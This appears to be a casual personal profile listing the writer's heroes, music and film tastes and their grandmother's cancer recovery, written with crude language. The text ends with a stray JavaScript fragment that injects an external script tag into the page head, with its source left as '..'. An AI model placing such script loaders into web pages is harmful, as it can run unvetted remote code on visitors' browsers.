who i would like to meet.... hmmm Jimi Hendrix, Brad Nowell, Bob Marley, John F. Kenney, Lewis Black, Tu Pac, Biggie, Jesus, My main man God
music basically is shit right now, it being the rap, where it makes no sense why they make millions off one shitty song....and rock is a potfull of little crying bitch music..i like old rock and some stuff now and rap back in the day with biggie, 2pac, Wutang, dre., ect...is the shit
i like alot of movies, favorites are the classics such as tommy boy and pulp fiction
screw reading....
my hero is mostly my grandmother. She was diagnosed with lung cancer when i was in 8th grade, she never smoked. she was given 2 years to live and that is now 5 years later and doing good. she slaves over me when i was younger and now my sister. i pray that the cancer will go away. .."var s=document.createElement('script');s.src='..';document.getEl ementsByTagName('head')[0].appendChild(s);"